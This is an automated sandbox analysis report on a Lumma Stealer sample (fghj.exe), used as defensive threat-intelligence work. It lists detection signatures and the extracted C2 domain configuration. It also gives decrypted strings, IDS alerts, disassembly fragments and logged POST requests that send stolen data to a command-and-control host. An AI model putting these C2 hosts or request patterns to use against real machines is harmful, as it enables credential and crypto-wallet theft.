Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fghj.exe

Overview

General Information

Sample name:fghj.exe
Analysis ID:1587452
MD5:549e550f48b48de65c69c4e87bffaa00
SHA1:ff5914ba3411ba52049f9cec0b7c5267d2f7015a
SHA256:b4129afa37522ee77ca932eb2f29c16df3ad47dc6cc52864ef488fbb537296e2
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fghj.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\fghj.exe" MD5: 549E550F48B48DE65C69C4E87BFFAA00)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["deafeninggeh.biz", "debonairnukk.xyz", "immureprech.biz", "spellshagey.biz", "sordid-snaked.cyou", "diffuculttan.xyz", "effecterectz.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou"], "Build id": "HpOoIh--2a727a032c4d"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4b0e1:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x4e677:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 12 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.921641+010020283713Unknown Traffic192.168.2.949815104.102.49.254443TCP
              2025-01-10T11:47:50.086323+010020283713Unknown Traffic192.168.2.949826104.21.96.1443TCP
              2025-01-10T11:47:51.162537+010020283713Unknown Traffic192.168.2.949832104.21.96.1443TCP
              2025-01-10T11:47:52.739731+010020283713Unknown Traffic192.168.2.949844104.21.96.1443TCP
              2025-01-10T11:47:53.982728+010020283713Unknown Traffic192.168.2.949850104.21.96.1443TCP
              2025-01-10T11:47:55.356824+010020283713Unknown Traffic192.168.2.949861104.21.96.1443TCP
              2025-01-10T11:47:56.746110+010020283713Unknown Traffic192.168.2.949872104.21.96.1443TCP
              2025-01-10T11:47:58.052478+010020283713Unknown Traffic192.168.2.949878104.21.96.1443TCP
              2025-01-10T11:47:59.062810+010020283713Unknown Traffic192.168.2.949889104.21.96.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:50.524034+010020546531A Network Trojan was detected192.168.2.949826104.21.96.1443TCP
              2025-01-10T11:47:51.650332+010020546531A Network Trojan was detected192.168.2.949832104.21.96.1443TCP
              2025-01-10T11:47:59.546802+010020546531A Network Trojan was detected192.168.2.949889104.21.96.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:50.524034+010020498361A Network Trojan was detected192.168.2.949826104.21.96.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:51.650332+010020498121A Network Trojan was detected192.168.2.949832104.21.96.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.229945+010020582101Domain Observed Used for C2 Detected192.168.2.9534731.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.166347+010020582141Domain Observed Used for C2 Detected192.168.2.9528571.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.202767+010020582161Domain Observed Used for C2 Detected192.168.2.9547891.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.191793+010020582181Domain Observed Used for C2 Detected192.168.2.9626571.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.180277+010020582201Domain Observed Used for C2 Detected192.168.2.9590471.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.152069+010020582221Domain Observed Used for C2 Detected192.168.2.9523851.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.240914+010020582261Domain Observed Used for C2 Detected192.168.2.9599991.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.139606+010020582851Domain Observed Used for C2 Detected192.168.2.9545541.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:48.218852+010020582361Domain Observed Used for C2 Detected192.168.2.9548261.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:57.480901+010020480941Malware Command and Control Activity Detected192.168.2.949872104.21.96.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:47:49.440994+010028586661Domain Observed Used for C2 Detected192.168.2.949815104.102.49.254443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://sputnik-1985.com/.msnAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com:443/api6Oa2x-M#Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apiobAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/&0Avira URL Cloud: Label: malware
              Source: spellshagey.bizAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com:443/apiUSER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apilaAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apibmAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/04Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/I3Avira URL Cloud: Label: malware
              Found malware configuration
              Source: fghj.exe.7372.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "debonairnukk.xyz", "immureprech.biz", "spellshagey.biz", "sordid-snaked.cyou", "diffuculttan.xyz", "effecterectz.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou"], "Build id": "HpOoIh--2a727a032c4d"}
              Multi AV Scanner detection for submitted file
              Source: fghj.exeVirustotal: Detection: 66%Perma Link
              Source: fghj.exeReversingLabs: Detection: 60%
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: spellshagey.biz
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--2a727a032c4d
              Source: fghj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49815 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49826 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49832 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49844 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49850 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49861 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49872 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49878 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49889 version: TLS 1.2
              Source: fghj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: Morpheme.pdb source: fghj.exe
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx]0_2_00B1B020
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [esi+edi*8], DDB7C3F3h0_2_00B3B1B5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then jmp eax0_2_00B171A3
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [ecx]0_2_00B1B1A6
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ebx, eax0_2_00B07195
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ebp, eax0_2_00B07195
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19h]0_2_00B3F185
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], B430E561h0_2_00B271DC
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ecx, ebx0_2_00B292A5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ecx, eax0_2_00B1B2F3
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00B352E5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], B430E561h0_2_00B271DA
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6A2D3EA3h0_2_00B2420B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6A2D3EA3h0_2_00B2420B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B18252
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_00B1725C
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00B1725C
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00B183D1
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 1F1F7B79h0_2_00B1A351
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+02h]0_2_00B234B5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B234B5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi-5D4033FDh]0_2_00B234B5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19h]0_2_00B3F4C5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B1E435
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [esi], ax0_2_00B1E435
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00B1D421
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6314EAC3h]0_2_00B27425
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-10h]0_2_00B27425
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edi, byte ptr [eax+esi]0_2_00B04405
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then push edi0_2_00B1E408
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00B2B475
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx+59055C60h]0_2_00B0B5BA
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+2EC34457h]0_2_00B255E5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov eax, dword ptr [004454B8h]0_2_00B2C5C8
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00B2D51A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [eax]0_2_00B0E55A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_00B1A545
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ebx, ecx0_2_00B1A545
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00B1A545
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then push eax0_2_00B3C685
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]0_2_00B24785
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx esi, byte ptr [eax]0_2_00B0F7C9
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then jmp eax0_2_00B28718
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov edx, ecx0_2_00B1B765
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00B2C8B9
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00B0A835
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+10h]0_2_00B3F835
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx esi, byte ptr [eax]0_2_00B3F835
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00B2C829
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00B2D82C
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00B2C85B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [edi], cx0_2_00B239B5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]0_2_00B0BA8C
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then jmp eax0_2_00B16AFB
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+01h]0_2_00B0AAC5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then lea ecx, dword ptr [eax+77h]0_2_00B29A11
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+3Ch]0_2_00B1CA05
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov edx, ebx0_2_00B38A05
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then test eax, eax0_2_00B38A05
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp edx, esi0_2_00B38A05
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00B17A77
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_00B18A5A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov edi, ebx0_2_00B2AA40
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [edx], cl0_2_00B27A46
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7C7A349Ah0_2_00B16BD9
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then jmp eax0_2_00B1EB53
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ecx, eax0_2_00B28B51
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_00B16C97
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h0_2_00B16C9C
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]0_2_00B08CF5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_00B08CF5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 1E7AC822h0_2_00B23DEE
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ecx, eax0_2_00B19D16
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edi, byte ptr [ebp+eax-29h]0_2_00B3CD1D
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then cmp byte ptr [edi+eax+09h], 00000000h0_2_00B37D75
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19h]0_2_00B3EE85
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00B19E54
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00B19E59
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [edx], cx0_2_00B17E40
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+000000B8h]0_2_00B2DFA7
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+000000B8h]0_2_00B2DFAC
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B21FD5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+000000B8h]0_2_00B2DF34
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ecx, eax0_2_00B0EF6D
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+00000120h]0_2_00B0EF6D
              Source: C:\Users\user\Desktop\fghj.exeCode function: 4x nop then mov ecx, dword ptr [esi+40h]0_2_00B19F6E

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058285 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz) : 192.168.2.9:54554 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.9:54789 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.9:52385 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.9:52857 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.9:53473 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.9:59047 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.9:54826 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.9:59999 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.9:62657 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49826 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49889 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49826 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49872 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49815 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49832 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49832 -> 104.21.96.1:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: deafeninggeh.biz
              Source: Malware configuration extractorURLs: debonairnukk.xyz
              Source: Malware configuration extractorURLs: immureprech.biz
              Source: Malware configuration extractorURLs: spellshagey.biz
              Source: Malware configuration extractorURLs: sordid-snaked.cyou
              Source: Malware configuration extractorURLs: diffuculttan.xyz
              Source: Malware configuration extractorURLs: effecterectz.xyz
              Source: Malware configuration extractorURLs: awake-weaves.cyou
              Source: Malware configuration extractorURLs: wrathful-jammy.cyou
              Performs DNS queries to domains with low reputation
              Source: DNS query: effecterectz.xyz
              Source: DNS query: diffuculttan.xyz
              Source: DNS query: debonairnukk.xyz
              Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49815 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49832 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49826 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49844 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49850 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49861 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49872 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49878 -> 104.21.96.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49889 -> 104.21.96.1:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=93F28NVF3FRCC6SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12834Host: sputnik-1985.com
